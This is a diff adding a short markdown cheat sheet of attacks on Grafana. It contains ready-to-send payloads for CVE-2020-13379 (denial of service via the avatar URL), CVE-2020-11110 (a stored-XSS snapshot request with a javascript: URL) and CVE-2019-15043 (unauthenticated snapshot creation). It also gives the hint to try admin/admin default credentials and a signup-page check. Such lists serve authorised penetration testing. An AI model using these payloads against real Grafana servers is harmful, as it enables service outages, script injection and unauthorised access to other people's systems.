| 1 | + | # Grafana |
| 2 | + | 1. CVE-2020-13379 (Denial of Service) |
| 3 | + | ``` |
| 4 | + | <GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D |
| 5 | + | ``` |
| 6 | + | 2. CVE-2020-11110 (Stored XSS) |
| 7 | + | ``` |
| 8 | + | POST /api/snapshots HTTP/1.1 |
| 9 | + | Host: <GRAFANA URL> |
| 10 | + | Accept: application/json, text/plain, */* |
| 11 | + | Accept-Language: en-US,en;q=0.5 |
| 12 | + | Referer: {{BaseURL}} |
| 13 | + | content-type: application/json |
| 14 | + | Connection: close |
| 15 | + | |
| 16 | + | {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} |
| 17 | + | ``` |
| 18 | + | 3. CVE-2019-15043 (Grafana Unauthenticated API) |
| 19 | + | ``` |
| 20 | + | POST /api/snapshots HTTP/1.1 |
| 21 | + | Host: <GRAFANA URL> |
| 22 | + | Connection: close |
| 23 | + | Content-Length: 235 |
| 24 | + | Accept: */* |
| 25 | + | Accept-Language: en |
| 26 | + | Content-Type: application/json |
| 27 | + | |
| 28 | + | {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} |
| 29 | + | ``` |
| 30 | + | 4. Default Credentials |
| 31 | + | ``` |
| 32 | + | Try to login using admin as username and password |
| 33 | + | ``` |
| 34 | + | 5. Signup Enabled |
| 35 | + | ``` |
| 36 | + | <GRAFANA URL>/signup |
| 37 | + | ``` |